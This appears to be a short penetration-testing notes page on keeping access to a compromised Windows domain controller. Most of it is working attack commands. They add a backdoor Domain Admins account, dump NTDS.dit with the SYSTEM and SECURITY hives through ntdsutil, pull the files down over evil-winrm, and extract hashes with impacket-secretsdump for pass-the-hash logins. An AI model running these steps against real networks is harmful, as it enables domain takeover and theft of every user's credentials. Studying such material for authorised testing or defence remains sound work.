Plot
Let’s say you have successfully compromised the target system as root. However, you might not have stable shell connection such as SSH or you might not know the password and only have reverse shell connection.
These connections are still shell but it is loud and ugly. It is also complicated to reproduce.
Below are several ways of maintaining persistence once gained shell as a root.
Adding Domain Admin User
I can simply create a new user and add the user in Domain Admins group as such:
net user jadu jadu101 /add
net group "Domain Admins" /add jadu
Now with evil-winrm, I can sign in as the created user:
Dumping NTDS.dit
I can dump NTDS.dit to obtain hashes for users and pass those hashes to gain connection to the machine.
Below command dumps SECURITY, SYSTEM, and NTDS.dit file to Temp folder which could be downloaded to dump password hashes:
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
On /Temp/registry, I have SECURITY and SYSTEM file which I download to local machine:
download SECURITY
download SYSTEM
On /Temp/Active-Directory, I have NTDS.dit file which I download to local machine as well:
download ntds.dit
Now with secretsdump, I can obtain bunch of password hashes:
root@~/tools/mitre/ntds# /usr/bin/impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local
I can try to crack these hashes, but it is not necessary. I can pass the NT part of the hashes to gain shell connection:
Here are more steps you can follow once you obtain hash for Administrator.